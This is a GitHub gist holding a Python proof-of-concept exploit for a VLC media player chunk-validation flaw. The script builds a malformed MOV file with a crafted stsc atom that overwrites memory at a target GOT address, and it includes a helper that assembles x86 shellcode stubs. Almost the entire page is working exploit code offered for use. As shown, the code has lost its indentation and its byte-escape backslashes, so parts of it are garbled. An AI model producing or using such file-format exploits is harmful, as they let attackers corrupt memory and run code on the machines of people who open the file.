Skip to content

Instantly share code, notes, and snippets.

@ant4g0nist

ant4g0nist/PoC for VLC media player chunk context validation error

Created July 10, 2013 16:33
Show Gist options
  • Save ant4g0nist/5967860 to your computer and use it in GitHub Desktop.
Save ant4g0nist/5967860 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
PoC for VLC media player chunk context validation error
#vlc_poc.py:
import struct
import sys
class mov_exploit:
def __init__(self,blocksize,gotbase,gotsize,shellcodebase=None,arch='win32'):
self.arch=arch
self.blocksize=blocksize
self.gotbase=gotbase
self.gotsize=gotsize
if shellcodebase!=None:
self.shellcodebase=shellcodebase
else:
self.shellcodebase=self.revert_calc(self.make_calc(self.gotbase+self.gotsize+100))
mdat = self.mkatom("mdat","MALDAAAAAD!")
mvhd = self.mkatom("mvhd", "A"*100)
WW = []
jmpaddress = struct.pack(">L",0x42424242)
maximo=-52000
minimo=-51000
WW.append((maximo,jmpaddress*2))
WW.append((minimo,jmpaddress*2))
stscjmp = self.mkatom("stsc",self._mkstsc(WW))
trakjmp = self._mktrak(stscjmp)
moov = self.mkatom("moov",trakjmp+mvhd)
ftyp = self.mkatom("ftyp","3gp4"+"x00x00x02x00"+"3gp4"+"3gp33gp23gp1")
self.file = ftyp+mdat+moov
def __str__(self):
return self.file
def mkatom(self,type,data):
if len(type) != 4:
raise "type must by of length 4!!!"
mov = ""
mov += struct.pack(">L",len(data)+8)
mov += type
mov += data
return mov
def make_calc(self,x):
r3t =(((x-4) / self.blocksize) + 1)
return r3t
def revert_calc(self,x):
r = (self.blocksize * (x-1)) + 4
return r
def _reverse(self,s):
l = list(s)
l.reverse()
return "".join(l)
def _mkstsc(self,l):
r3t = ""
r3t += struct.pack(">L",1)
r3t += struct.pack(">L",len(l)+1)
oldwhere = 0
for where, what in l:
oldwhere = where
if len(what) != 8:
raise "Wrong what leng"
r3t += struct.pack(">L",where) + what #self._reverse(what)
r3t += struct.pack(">L",where + 1) + "FELISCCC"
return r3t
def _mkstsc(self,l):
r3t = ""
r3t += struct.pack(">L",1) #version, format needed
r3t += struct.pack(">L",len(l)+1) #number of stsc chunks
oldwhere = 0
for where, what in l:
oldwhere = where
if len(what) != 8:
raise "Wrong what leng %d"%len(what)
r3t += struct.pack(">L",where) + what #self._reverse(what)
r3t += struct.pack(">L",where + 1) + "FELISaLS"
return r3t
def _pack(self,s):
if len(s) != 8:
raise "Wrong size!"
return s[3]+s[2]+s[1]+s[0]+s[7]+s[6]+s[5]+s[4]
def _pack4(self,s):
if len(s) != 4:
raise "Wrong size!"
return s[3]+s[2]+s[1]+s[0]
def _mkshellcode(self,payload):
if len(payload) % 4:
payload += "X" * (4 - len(payload) % 4)
payload = self._reverse(payload)
movesp = 'xbc'
push = 'x68'
jmps = 'xeb'
nop = 'x90'
shellcode = []
scode = ""
scode += movesp +
struct.pack("<L",4+self.shellcodebase+(len(payload)/4)*self.blocksize+len(payload)+1)
scode += nop*(8-(len(scode)+2))
scode += jmps + struct.pack("B",self.blocksize-8)
shellcode.append(scode)
for i in range(0,len(payload),4):
scode = ""
scode += push + self._pack4(payload[i:i+4])
scode += nop*(8-(len(scode)+2))
scode += jmps + struct.pack("B",self.blocksize-8)
shellcode.append(scode)
return shellcode
def _mktrak(self,stsc):
tkhd = self.mkatom("tkhd", "A"*100)
hdlr = self.mkatom("hdlr", "x00"*4+"mhlrtext"+"appl"+"x00"*9)
mdhd = self.mkatom("mdhd", "A"*100)
co64 = self.mkatom("co64", struct.pack(">L",10) + struct.pack(">L",2) + "A"*100)
stbl = self.mkatom("stbl",self.mkatom("stsd","UFFFF") + co64+ stsc)
minf = self.mkatom("minf",stbl)
mdia = self.mkatom("mdia",minf+mdhd+hdlr)
trakjmp = self.mkatom("trak",mdia+tkhd+mdia)
return trakjmp
try:
binary_file = mov_exploit(20,0x872e0f8,3996,arch="linux").__str__()
file = open(sys.argv[1], "wb")
file.write(binary_file)
file.close()
print "[+] File %s already generated" % sys.argv[1]
except:
print "[+] Usage: python vlc_poc.py anyname.mov"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment